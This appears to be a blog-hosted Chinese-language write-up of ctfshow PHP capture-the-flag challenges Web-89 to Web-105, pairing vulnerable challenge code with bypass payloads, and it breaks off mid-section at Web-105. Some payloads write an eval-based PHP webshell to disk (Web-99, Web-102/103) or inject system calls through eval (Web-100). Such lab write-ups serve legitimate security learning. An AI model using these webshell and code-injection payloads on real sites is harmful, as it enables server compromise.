

<!DOCTYPE html>
<html lang="en-US" data-default-color-scheme=auto>



<head>
  <meta charset="UTF-8">
  <link rel="apple-touch-icon" sizes="76x76" href="/img/favicon.png">
  <link rel="icon" href="/images/logo.png">
  <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=5.0, shrink-to-fit=no">
  <meta http-equiv="x-ua-compatible" content="ie=edge">
  
  <meta name="theme-color" content="#2f4154">
  <meta name="author" content="zkuan">
  <meta name="keywords" content="">
  
    <meta name="description" content="CTFshow:PHP特性学习">
<meta property="og:type" content="article">
<meta property="og:title" content="PHP Security Features">
<meta property="og:url" content="https://whoiszkuan.github.io/2021/12/02/PHP-Security-Features/index.html">
<meta property="og:site_name" content="4CH4N ZKUAN">
<meta property="og:description" content="CTFshow:PHP特性学习">
<meta property="og:locale" content="en_US">
<meta property="og:image" content="https://gitee.com/zku4n/picgo/raw/master/img/image-20211201191106865.png">
<meta property="og:image" content="https://gitee.com/zku4n/picgo/raw/master/img/image-20211201191243482.png">
<meta property="og:image" content="https://gitee.com/zku4n/picgo/raw/master/img/image-20211202105809062.png">
<meta property="og:image" content="https://gitee.com/zku4n/picgo/raw/master/img/image-20211202105318433.png">
<meta property="article:published_time" content="2021-12-02T13:11:17.000Z">
<meta property="article:modified_time" content="2021-12-21T03:28:23.233Z">
<meta property="article:author" content="zkuan">
<meta property="article:tag" content="Security">
<meta property="article:tag" content="Web">
<meta property="article:tag" content="PHP">
<meta name="twitter:card" content="summary_large_image">
<meta name="twitter:image" content="https://gitee.com/zku4n/picgo/raw/master/img/image-20211201191106865.png">
  
  
  <title>PHP Security Features - 4CH4N ZKUAN</title>

  <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/bootstrap@4/dist/css/bootstrap.min.css" />


  <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/github-markdown-css@4/github-markdown.min.css" />
  <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/hint.css@2/hint.min.css" />

  
    
    
      
      
        
          
        
        <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/prismjs@1/themes/prism.min.css" />
      
      
        <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/prismjs@1/plugins/line-numbers/prism-line-numbers.min.css" />
      
    
  

  
    <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fancyapps/fancybox@3/dist/jquery.fancybox.min.css" />
  


<!-- 主题依赖的图标库，不要自行修改 -->

<link rel="stylesheet" href="//at.alicdn.com/t/font_1749284_ba1fz6golrf.css">



<link rel="stylesheet" href="//at.alicdn.com/t/font_1736178_lbnruvf0jn.css">


<link  rel="stylesheet" href="/css/main.css" />

<!-- 自定义样式保持在最底部 -->


  <script id="fluid-configs">
    var Fluid = window.Fluid || {};
    var CONFIG = {"hostname":"whoiszkuan.github.io","root":"/","version":"1.8.14","typing":{"enable":true,"typeSpeed":70,"cursorChar":"_","loop":false},"anchorjs":{"enable":true,"element":"h1,h2,h3,h4,h5,h6","placement":"right","visible":"hover","icon":""},"progressbar":{"enable":true,"height_px":3,"color":"#29d","options":{"showSpinner":false,"trickleSpeed":100}},"copy_btn":true,"image_zoom":{"enable":true,"img_url_replace":["",""]},"toc":{"enable":true,"headingSelector":"h1,h2,h3,h4,h5,h6","collapseDepth":0},"lazyload":{"enable":true,"loading_img":"/img/loading.gif","onlypost":false,"offset_factor":2},"web_analytics":{"enable":false,"baidu":null,"google":null,"gtag":null,"tencent":{"sid":null,"cid":null},"woyaola":null,"cnzz":null,"leancloud":{"app_id":null,"app_key":null,"server_url":null,"path":"window.location.pathname","ignore_local":false}},"search_path":"/local-search.xml"};
  </script>
  <script  src="/js/utils.js" ></script>
  <script  src="/js/color-schema.js" ></script>
<meta name="generator" content="Hexo 5.4.0"><link rel="alternate" href="/atom.xml" title="4CH4N ZKUAN" type="application/atom+xml">
</head>


<body>
  <header style="height: 70vh;">
    <nav id="navbar" class="navbar fixed-top  navbar-expand-lg navbar-dark scrolling-navbar">
  <div class="container">
    <a class="navbar-brand" href="/">
      <strong>0x95cn</strong>
    </a>

    <button id="navbar-toggler-btn" class="navbar-toggler" type="button" data-toggle="collapse"
            data-target="#navbarSupportedContent"
            aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation">
      <div class="animated-icon"><span></span><span></span><span></span></div>
    </button>

    <!-- Collapsible content -->
    <div class="collapse navbar-collapse" id="navbarSupportedContent">
      <ul class="navbar-nav ml-auto text-center">
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/">
                <i class="iconfont icon-home-fill"></i>
                Startseite
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/archives/">
                <i class="iconfont icon-archive-fill"></i>
                Archiv
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/categories/">
                <i class="iconfont icon-category-fill"></i>
                Kategorie
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/tags/">
                <i class="iconfont icon-tags-fill"></i>
                Etiketten
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/about/">
                <i class="iconfont icon-user-fill"></i>
                Über mich
              </a>
            </li>
          
        
        
          <li class="nav-item" id="search-btn">
            <a class="nav-link" target="_self" href="javascript:;" data-toggle="modal" data-target="#modalSearch" aria-label="Search">
              &nbsp;<i class="iconfont icon-search"></i>&nbsp;
            </a>
          </li>
        
        
          <li class="nav-item" id="color-toggle-btn">
            <a class="nav-link" target="_self" href="javascript:;" aria-label="Color Toggle">&nbsp;<i
                class="iconfont icon-dark" id="color-toggle-icon"></i>&nbsp;</a>
          </li>
        
      </ul>
    </div>
  </div>
</nav>

    <div class="banner" id="banner" parallax=true
         style="background: url('/images/banner1.png') no-repeat center center;
           background-size: cover;">
      <div class="full-bg-img">
        <div class="mask flex-center" style="background-color: rgba(0, 0, 0, 0.3)">
          <div class="page-header text-center fade-in-up">
            <span class="h2" id="subtitle" title="PHP Security Features">
              
            </span>

            
              <div class="mt-3">
  
  
    <span class="post-meta">
      <i class="iconfont icon-date-fill" aria-hidden="true"></i>
      <time datetime="2021-12-02 21:11" pubdate>
        December 2, 2021 pm
      </time>
    </span>
  
</div>

<div class="mt-1">
  
    <span class="post-meta mr-2">
      <i class="iconfont icon-chart"></i>
      18k 字
    </span>
  

  
    <span class="post-meta mr-2">
      <i class="iconfont icon-clock-fill"></i>
      
      
      151 分钟
    </span>
  

  
  
</div>

            
          </div>

          
        </div>
      </div>
    </div>
  </header>

  <main>
    
      

<div class="container-fluid nopadding-x">
  <div class="row nomargin-x">
    <div class="d-none d-lg-block col-lg-2"></div>
    <div class="col-lg-8 nopadding-x-md">
      <div class="container nopadding-x-md" id="board-ctn">
        <div class="py-5" id="board">
          <article class="post-content mx-auto">
            <!-- SEO header -->
            <h1 style="display: none">PHP Security Features</h1>
            
            <div class="markdown-body">
              <h1 id="Web-89-数组绕过"><a href="#Web-89-数组绕过" class="headerlink" title="Web-89 数组绕过"></a>Web-89 数组绕过</h1><div class="code-wrapper"><pre class="line-numbers language-php" data-language="php"><code class="language-php">include(&quot;flag.php&quot;);
highlight_file(__FILE__);

if(isset($_GET[&#39;num&#39;]))&#123;
    $num &#x3D; $_GET[&#39;num&#39;];
    if(preg_match(&quot;&#x2F;[0-9]&#x2F;&quot;, $num))&#123;
        die(&quot;no no no!&quot;);
    &#125;
    if(intval($num))&#123;
        echo $flag;
    &#125;
&#125;<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre></div>

<p><code>preg_match</code>正则匹配<code>0-9</code>通过数组绕过</p>
<ul>
<li>payload：<code>?num[]=</code></li>
</ul>
<h1 id="Web-90-intval"><a href="#Web-90-intval" class="headerlink" title="Web-90 intval"></a>Web-90 intval</h1><div class="code-wrapper"><pre class="line-numbers language-php" data-language="php"><code class="language-php">include(&quot;flag.php&quot;);
highlight_file(__FILE__);
if(isset($_GET[&#39;num&#39;]))&#123;
    $num &#x3D; $_GET[&#39;num&#39;];
    if($num&#x3D;&#x3D;&#x3D;&quot;4476&quot;)&#123;
        die(&quot;no no no!&quot;);
    &#125;
    if(intval($num,0)&#x3D;&#x3D;&#x3D;4476)&#123;
        echo $flag;
    &#125;else&#123;
        echo intval($num,0);
    &#125;
&#125;<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre></div>

<h2 id="intval函数说明"><a href="#intval函数说明" class="headerlink" title="intval函数说明"></a>intval函数说明</h2><p>intval-获取变量的整数值</p>
<p><code>intval (mixed $var [,int $base=10]) : int</code></p>
<ul>
<li>var<ul>
<li>要转换成integer的数量值</li>
</ul>
</li>
<li>base<ul>
<li>转化所使用的进制</li>
</ul>
</li>
</ul>
<blockquote>
<p>如果base是0，通过监测var的格式来决定使用的进制</p>
<ul>
<li>如果字符串包括了”0x”或”0X”的前缀，使用16进制(hex)</li>
<li>如果字符串以”0”开始，使用8进制(octal)，否则将使用十进制。</li>
</ul>
</blockquote>
<p>通过使用指定的进制base转换（默认十进制），返回变量var的integer数值。intval()不能用于object，否则会产生E_NOTICE错误并返回1.</p>
<p>综上所述，要构造一个不强等于4476，又要使intval函数处理后的结果强等于4476：</p>
<p><code>?num=0x117c</code></p>
<p>or</p>
<p><code>?numb=4476a</code></p>
<h1 id="Web-91-0a绕过"><a href="#Web-91-0a绕过" class="headerlink" title="Web-91 %0a绕过"></a>Web-91 %0a绕过</h1><div class="code-wrapper"><pre class="line-numbers language-php" data-language="php"><code class="language-php">show_source(__FILE__);
include(&#39;flag.php&#39;);
$a&#x3D;$_GET[&#39;cmd&#39;];
if(preg_match(&#39;&#x2F;^php$&#x2F;im&#39;, $a))&#123;
    if(preg_match(&#39;&#x2F;^php$&#x2F;i&#39;, $a))&#123;
        echo &#39;hacker&#39;;
    &#125;
    else&#123;
        echo $flag;
    &#125;
&#125;
else&#123;
    echo &#39;nonononono&#39;;
&#125;<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre></div>

<table>
<thead>
<tr>
<th>修饰符</th>
<th>含义</th>
</tr>
</thead>
<tbody><tr>
<td>i</td>
<td>ignore-不区分大小写</td>
</tr>
<tr>
<td>g</td>
<td>global-全局匹配</td>
</tr>
<tr>
<td>m</td>
<td>multi line-多行匹配</td>
</tr>
<tr>
<td>s</td>
<td>特殊字符圆点 <code>.</code> 中包含换行符 <code>\n</code></td>
</tr>
</tbody></table>
<p>第一个<code>if</code>：匹配多行且不区分大小写，满足两个条件进入第二个判断</p>
<p>第二个<code>if</code>：区分大小写但只匹配单行，如果第一行不存在php则打印出flag。</p>
<p>综上所述：可使用换行符+字符串php，同时满足两个判断的条件，当第一个判断时，换行符+php为两行既多行，且能匹配到字符串php。进入第二个判断，第一行为换行符，即第一行为空不为php，所以输出flag</p>
<p><code>payload</code>:<code>?cmd=%0aphp</code></p>
<h1 id="Web-92-intval-八进制十六进制绕过"><a href="#Web-92-intval-八进制十六进制绕过" class="headerlink" title="Web-92 intval 八进制十六进制绕过"></a>Web-92 intval 八进制十六进制绕过</h1><div class="code-wrapper"><pre class="line-numbers language-php" data-language="php"><code class="language-php">include(&quot;flag.php&quot;);
highlight_file(__FILE__);
if(isset($_GET[&#39;num&#39;]))&#123;
    $num &#x3D; $_GET[&#39;num&#39;];
    if($num&#x3D;&#x3D;4476)&#123;
        die(&quot;no no no!&quot;);
    &#125;
    if(intval($num,0)&#x3D;&#x3D;4476)&#123;
        echo $flag;
    &#125;else&#123;
        echo intval($num,0);
    &#125;
&#125;<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre></div>

<p>intval函数，可使用八进制(010574)或十六进制(0x117c)绕过</p>
<h1 id="Web-93-intval-八进制绕过"><a href="#Web-93-intval-八进制绕过" class="headerlink" title="Web-93 intval 八进制绕过"></a>Web-93 intval 八进制绕过</h1><div class="code-wrapper"><pre class="line-numbers language-php" data-language="php"><code class="language-php">include(&quot;flag.php&quot;);
highlight_file(__FILE__);
if(isset($_GET[&#39;num&#39;]))&#123;
    $num &#x3D; $_GET[&#39;num&#39;];
    if($num&#x3D;&#x3D;4476)&#123;
        die(&quot;no no no!&quot;);
    &#125;
    if(preg_match(&quot;&#x2F;[a-z]&#x2F;i&quot;, $num))&#123;
        die(&quot;no no no!&quot;);
    &#125;
    if(intval($num,0)&#x3D;&#x3D;4476)&#123;
        echo $flag;
    &#125;else&#123;
        echo intval($num,0);
    &#125;
&#125;<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre></div>

<p>正则表达式过滤了<code>[a-z]</code>字母，可使用intval八进制(010574)绕过</p>
<h1 id="Web-94-intval-小数点绕过"><a href="#Web-94-intval-小数点绕过" class="headerlink" title="Web-94 intval 小数点绕过"></a>Web-94 intval 小数点绕过</h1><div class="code-wrapper"><pre class="line-numbers language-php" data-language="php"><code class="language-php">include(&quot;flag.php&quot;);
highlight_file(__FILE__);
if(isset($_GET[&#39;num&#39;]))&#123;
    $num &#x3D; $_GET[&#39;num&#39;];
    if($num&#x3D;&#x3D;&#x3D;&quot;4476&quot;)&#123;
        die(&quot;no no no!&quot;);
    &#125;
    if(preg_match(&quot;&#x2F;[a-z]&#x2F;i&quot;, $num))&#123;
        die(&quot;no no no!&quot;);
    &#125;
    if(!strpos($num, &quot;0&quot;))&#123;
        die(&quot;no no no!&quot;);
    &#125;
    if(intval($num,0)&#x3D;&#x3D;&#x3D;4476)&#123;
        echo $flag;
    &#125;
&#125;<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre></div>

<p>比较上一关出现了strpos()函数，函数说明</p>
<ul>
<li>查找关键字在字符串中第一次出现的位置</li>
<li>对大小写敏感</li>
<li>返回字符串在另一字符串中第一次出现的位置，如果没有字符串则返回FALSE。</li>
</ul>
<p><code>!strpos($num, &quot;0&quot;)</code>限制了传参时第一位不能为0，如果第一位为0，则die，在字符串中找不到0，也会die。</p>
<p>payload可为：</p>
<p>空格+八进制：<code> 010574</code></p>
<p>小数点+0：<code>4476.0</code></p>
<p>头部加号+尾部小数点：<code>+4476.0</code></p>
<h1 id="Web-95-intval-空格绕过"><a href="#Web-95-intval-空格绕过" class="headerlink" title="Web-95 intval 空格绕过"></a>Web-95 intval 空格绕过</h1><div class="code-wrapper"><pre class="line-numbers language-php" data-language="php"><code class="language-php">include(&quot;flag.php&quot;);
highlight_file(__FILE__);
if(isset($_GET[&#39;num&#39;]))&#123;
    $num &#x3D; $_GET[&#39;num&#39;];
    if($num&#x3D;&#x3D;4476)&#123;
        die(&quot;no no no!&quot;);
    &#125;
    if(preg_match(&quot;&#x2F;[a-z]|\.&#x2F;i&quot;, $num))&#123;
        die(&quot;no no no!!&quot;);
    &#125;
    if(!strpos($num, &quot;0&quot;))&#123;
        die(&quot;no no no!!!&quot;);
    &#125;
    if(intval($num,0)&#x3D;&#x3D;&#x3D;4476)&#123;
        echo $flag;
    &#125;
&#125;<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre></div>

<p>过滤了小数点，可用<code>空格+八进制绕过</code>：<code> 010574</code></p>
<p>也可用<code>URL编码+八进制绕过</code>：<code>%20010574</code>or<code>%0a010574</code></p>
<h1 id="Web-96-绝对路径，相对路径"><a href="#Web-96-绝对路径，相对路径" class="headerlink" title="Web-96 绝对路径，相对路径"></a>Web-96 绝对路径，相对路径</h1><div class="code-wrapper"><pre class="line-numbers language-php" data-language="php"><code class="language-php">highlight_file(__FILE__);

if(isset($_GET[&#39;u&#39;]))&#123;
    if($_GET[&#39;u&#39;]&#x3D;&#x3D;&#39;flag.php&#39;)&#123;
        die(&quot;no no no&quot;);
    &#125;else&#123;
        highlight_file($_GET[&#39;u&#39;]);
    &#125;
&#125;<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre></div>

<p>不能直接读取<code>flag.php</code>，</p>
<p>绝对路径读取：<code>/var/www/html/flag.php</code></p>
<p>相对路径读取：<code>./flag.php</code></p>
<p>两者皆可读取flag</p>
<h1 id="Web-97-md5强比较"><a href="#Web-97-md5强比较" class="headerlink" title="Web-97 md5强比较"></a>Web-97 md5强比较</h1><div class="code-wrapper"><pre class="line-numbers language-php" data-language="php"><code class="language-php">include(&quot;flag.php&quot;);
highlight_file(__FILE__);
if (isset($_POST[&#39;a&#39;]) and isset($_POST[&#39;b&#39;])) &#123;
if ($_POST[&#39;a&#39;] !&#x3D; $_POST[&#39;b&#39;])
if (md5($_POST[&#39;a&#39;]) &#x3D;&#x3D;&#x3D; md5($_POST[&#39;b&#39;]))
echo $flag;
else
print &#39;Wrong.&#39;;
&#125;<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre></div>

<p>强比较：如果传入md5函数的不是数值和字符串，而是对象，那么就会返回null，null===null为True，成功绕过</p>
<p>payload：<code>a[]=1&amp;b[]=2</code></p>
<h1 id="Web-98-三元运算"><a href="#Web-98-三元运算" class="headerlink" title="Web-98 三元运算"></a>Web-98 三元运算</h1><div class="code-wrapper"><pre class="line-numbers language-php" data-language="php"><code class="language-php">include(&quot;flag.php&quot;);
$_GET?$_GET&#x3D;&amp;$_POST:&#39;flag&#39;;
$_GET[&#39;flag&#39;]&#x3D;&#x3D;&#39;flag&#39;?$_GET&#x3D;&amp;$_COOKIE:&#39;flag&#39;;
$_GET[&#39;flag&#39;]&#x3D;&#x3D;&#39;flag&#39;?$_GET&#x3D;&amp;$_SERVER:&#39;flag&#39;;
highlight_file($_GET[&#39;HTTP_FLAG&#39;]&#x3D;&#x3D;&#39;flag&#39;?$flag:__FILE__);<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span></span></code></pre></div>

<p><code>$_GET?$_GET=&amp;$_POST:&#39;flag&#39;;</code>和<code>$_GET[&#39;HTTP_FLAG&#39;]==&#39;flag&#39;</code>是重点只需GET方式随便获取一个值，使POST赋值到GET，以POST方式传输<code>HTTP_FLAG=flag</code>即可</p>
<p>payload:GET:<code>?a=a</code>,POST:<code>HTTP_FLAG=flag</code></p>
<h1 id="Web-99-in-array绕过"><a href="#Web-99-in-array绕过" class="headerlink" title="Web-99 in_array绕过"></a>Web-99 in_array绕过</h1><div class="code-wrapper"><pre class="line-numbers language-php" data-language="php"><code class="language-php">highlight_file(__FILE__);
$allow &#x3D; array();
for ($i&#x3D;36; $i &lt; 0x36d; $i++) &#123; 
    array_push($allow, rand(1,$i));
&#125;
if(isset($_GET[&#39;n&#39;]) &amp;&amp; in_array($_GET[&#39;n&#39;], $allow))&#123;
    file_put_contents($_GET[&#39;n&#39;], $_POST[&#39;content&#39;]);
&#125;<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre></div>

<h2 id="in-array"><a href="#in-array" class="headerlink" title="in_array"></a>in_array</h2><p>in_array — 检查数组中是否存在某个值</p>
<p>语法：</p>
<blockquote>
<p>in_array ( <a href="ms-its://ms-its/res/language.pseudo-types.html#language.types.mixed">mixed</a> <code>$needle</code> , array <code>$haystack</code> [, bool <code>$strict</code> = <strong><code>FALSE</code></strong> ] ) : bool</p>
</blockquote>
<p>在<code>$haystack</code>中寻找<code>$needle</code>，如果没有设置<code>$strict</code>，则为弱比较。</p>
<p>因此，<code>$_GET[&#39;n&#39;]</code>传入值为<code>1.php</code>时弱等于<code>1</code>.</p>
<p>payload:</p>
<p>GET:<code>?n=1.php</code></p>
<p>POST:<code>content=&lt;?php eval($_POST[1]);?&gt;</code></p>
<p>然后打开<code>1.php</code>通过POST执行命令即可</p>
<h1 id="Web-100-反射类及运算符优先级"><a href="#Web-100-反射类及运算符优先级" class="headerlink" title="Web-100 反射类及运算符优先级"></a>Web-100 反射类及运算符优先级</h1><div class="code-wrapper"><pre class="line-numbers language-php" data-language="php"><code class="language-php">highlight_file(__FILE__);
include(&quot;ctfshow.php&quot;);
&#x2F;&#x2F;flag in class ctfshow;
$ctfshow &#x3D; new ctfshow();
$v1&#x3D;$_GET[&#39;v1&#39;];
$v2&#x3D;$_GET[&#39;v2&#39;];
$v3&#x3D;$_GET[&#39;v3&#39;];
$v0&#x3D;is_numeric($v1) and is_numeric($v2) and is_numeric($v3);
if($v0)&#123;
    if(!preg_match(&quot;&#x2F;\;&#x2F;&quot;, $v2))&#123;
        if(preg_match(&quot;&#x2F;\;&#x2F;&quot;, $v3))&#123;
            eval(&quot;$v2(&#39;ctfshow&#39;)$v3&quot;);
        &#125;
    &#125;
&#125;<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre></div>

<p>考察点：and 和 &amp;&amp; 的优先级以及<strong>反射类</strong><code>ReflectionClass</code></p>
<p>PHP运算符比较：<code>&amp;&amp;</code>&gt;<code>||</code>&gt;<code>=</code>&gt;<code>and</code>&gt;<code>or</code></p>
<div class="code-wrapper"><pre class="line-numbers language-php" data-language="php"><code class="language-php">$a&#x3D;true and false and false;
var_dump($a);	&#x2F;&#x2F;返回True

$a&#x3D;true &amp;&amp; false &amp;&amp; false;
var_dump($a);	&#x2F;&#x2F;返回False<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span></span></code></pre></div>

<p>因此，<code>$v0=is_numeric($v1) and is_numeric($v2) and is_numeric($v3);</code>只需v1为数字即可进入if。</p>
<p>两个判断中，要求<code>$v2</code>不包含;<code>$v3</code>包含;</p>
<p>根据反射类文档，可构造出<code>echo new ReflectionClass(&#39;ctfshow&#39;);</code>获取flag</p>
<p>构造URL Payload：<code>/?v1=1&amp;v2=echo new ReflectionClass&amp;v3=;</code></p>
<p>非预期解payload</p>
<p><code>v1=1&amp;v2=var_dump(&#39;ctfshow&#39;)/*&amp;v3=*/;</code></p>
<p><code>v1=1&amp;v2=?&gt;&lt;?php echo &#39;ls&#39;?&gt;/*&amp;v3=;*/</code></p>
<p><code>v1=1&amp;v2=-system(&#39;ls&#39;)-&amp;v3=-1;</code></p>
<h1 id="Web-101-反射类"><a href="#Web-101-反射类" class="headerlink" title="Web-101 反射类"></a>Web-101 反射类</h1><div class="code-wrapper"><pre class="line-numbers language-php" data-language="php"><code class="language-php">highlight_file(__FILE__);
include(&quot;ctfshow.php&quot;);
&#x2F;&#x2F;flag in class ctfshow;
$ctfshow &#x3D; new ctfshow();
$v1&#x3D;$_GET[&#39;v1&#39;];
$v2&#x3D;$_GET[&#39;v2&#39;];
$v3&#x3D;$_GET[&#39;v3&#39;];
$v0&#x3D;is_numeric($v1) and is_numeric($v2) and is_numeric($v3);
if($v0)&#123;
    if(!preg_match(&quot;&#x2F;\\\\|\&#x2F;|\~|\&#96;|\!|\@|\#|\\$|\%|\^|\*|\)|\-|\_|\+|\&#x3D;|\&#123;|\[|\&quot;|\&#39;|\,|\.|\;|\?|[0-9]&#x2F;&quot;, $v2))&#123;
        if(!preg_match(&quot;&#x2F;\\\\|\&#x2F;|\~|\&#96;|\!|\@|\#|\\$|\%|\^|\*|\(|\-|\_|\+|\&#x3D;|\&#123;|\[|\&quot;|\&#39;|\,|\.|\?|[0-9]&#x2F;&quot;, $v3))&#123;
            eval(&quot;$v2(&#39;ctfshow&#39;)$v3&quot;);
        &#125;
    &#125;
&#125;<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre></div>

<p>与上一题相同，过滤更严格，直接通过反射类ReflectionClass获取Flag。</p>
<h1 id="Web-102-103-hex2bin"><a href="#Web-102-103-hex2bin" class="headerlink" title="Web-102,103 hex2bin"></a>Web-102,103 hex2bin</h1><div class="code-wrapper"><pre class="line-numbers language-php" data-language="php"><code class="language-php">highlight_file(__FILE__);
$v1 &#x3D; $_POST[&#39;v1&#39;];
$v2 &#x3D; $_GET[&#39;v2&#39;];
$v3 &#x3D; $_GET[&#39;v3&#39;];
$v4 &#x3D; is_numeric($v2) and is_numeric($v3);
if($v4)&#123;
    $s &#x3D; substr($v2,2);
    $str &#x3D; call_user_func($v1,$s);
    echo $str;
    file_put_contents($v3,$str);
&#125;
else&#123;
    die(&#39;hacker&#39;);
&#125;<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre></div>

<p><strong>本题知识点：</strong>hex2bin(),is_numeric(),call_user_func(),file_put_contents()</p>
<h2 id="hex2bin"><a href="#hex2bin" class="headerlink" title="hex2bin"></a>hex2bin</h2><p>在PHP5中，hex2bin可将十六进制字符串转换为二进制字符串</p>
<p>本题中用于将木马编写为16进制字符串</p>
<h2 id="is-numeric"><a href="#is-numeric" class="headerlink" title="is_numeric"></a>is_numeric</h2><p>检测变量是否为数字或为数字字符串</p>
<p>在PHP5中，可识别十六进制字符串，可进行<code>0x</code>截断，经过截断后得到不带0x的16进制的木马文件</p>
<p>不过此环境是PHP7，不可以。</p>
<h2 id="call-user-func"><a href="#call-user-func" class="headerlink" title="call_user_func"></a>call_user_func</h2><p>把第一个参数作为回调函数调用，其余都是回调函数的参数</p>
<p>在本题中，通过<code>substr($v2,2)</code>截取从<code>2</code>开始以后的数值为<code>$s</code>，将<code>$s</code>作为<code>$v1(hex2bin)</code>的回调函数参数</p>
<h2 id="file-put-contents"><a href="#file-put-contents" class="headerlink" title="file_put_contents"></a>file_put_contents</h2><p>将一个字符串写入文件</p>
<p>语法：<code>file_put_contents($filename,$data);</code></p>
<p>本题中将<code>$str</code>中的内容写入<code>$v3</code>中</p>
<h2 id="构造"><a href="#构造" class="headerlink" title="构造"></a>构造</h2><p>综上所述，要让<code>$v2</code>均为数字，<code>$v3</code>利用伪协议写入</p>
<p>padload:</p>
<blockquote>
<p>GET:?v2=115044383959474e6864434171594473&amp;v3=php://filter/write=convert.base64-decode/resource=1.php</p>
<p>POST:v1=hex2bin</p>
</blockquote>
<p><code>$v2</code>中的e为科学计数法，可以被is_numeric识别，带有其他字符不可以。</p>
<h1 id="Web-104-sha1弱等于"><a href="#Web-104-sha1弱等于" class="headerlink" title="Web-104 sha1弱等于"></a>Web-104 sha1弱等于</h1><div class="code-wrapper"><pre class="line-numbers language-php" data-language="php"><code class="language-php">highlight_file(__FILE__);
include(&quot;flag.php&quot;);

if(isset($_POST[&#39;v1&#39;]) &amp;&amp; isset($_GET[&#39;v2&#39;]))&#123;
    $v1 &#x3D; $_POST[&#39;v1&#39;];
    $v2 &#x3D; $_GET[&#39;v2&#39;];
    if(sha1($v1)&#x3D;&#x3D;sha1($v2))&#123;
        echo $flag;
    &#125;
&#125;<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre></div>

<p>此题没有难度，<code>sha1($v1)</code>弱等于<code>sha1($v2)</code>，也就是说两个值经过sha1加密后传入URL即可。</p>
<p><code>sha1：计算字符串的sha1散列值，返回sha1散列值字符串。</code></p>
<p>payload:</p>
<blockquote>
<p>GET:?v2=40bd001563085fc35165329ea1ff5c5ecbdbbeef</p>
<p>POST:v1=40bd001563085fc35165329ea1ff5c5ecbdbbeef</p>
</blockquote>
<p>其他解法：</p>
<p>sha1函数无法处理数组类型，报错返回false</p>
<p>payload:<code>GET:?v2[]=1</code>and<code>POST:v1[]=2</code></p>
<h1 id="Web-105-覆盖"><a href="#Web-105-覆盖" class="headerlink" title="Web-105 $$覆盖"></a>Web-105 $$覆盖</h1><div class="code-wrapper"><pre class="line-numbers language-php" data-language="php"><code class="language-php">highlight_file(__FILE__);
include(&#39;flag.php&#39;);
error_reporting(0);
$error&#x3D;&#39;你还想要flag嘛？&#39;;
$suces&#x3D;&#39;既然你想要那给你吧！&#39;;
foreach($_GET as $key &#x3D;&gt; $value)&#123;
    if($key&#x3D;&#x3D;&#x3D;&#39;error&#39;)&#123;
        die(&quot;what are you doing?!&quot;);
    &#125;
    $$key&#x3D;$$value;
&#125;foreach($_POST as $key &#x3D;&gt; $value)&#123;
    if($value&#x3D;&#x3D;&#x3D;&#39;flag&#39;)&#123;
        die(&quot;what are you doing?!&quot;);
    &#125;
    $$key&#x3D;$$value;
&#125;
if(!($_POST[&#39;flag&#39;]&#x3D;&#x3D;$flag))&#123;
    die($error);
&#125;
echo &quot;your are good&quot;.$flag.&quot;\n&quot;;
die($suces);<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre></div>

<p>本题考察点：变量覆盖</p>
<p>根据代码中三个<code>if</code>判断，GET中的值不能强等于<code>error</code>,POST中的值不能强等于<code>flag</code>且POST中的值需要弱等于<code>flag</code>否则die。</p>
<p>利用变量覆盖绕过</p>
<blockquote>
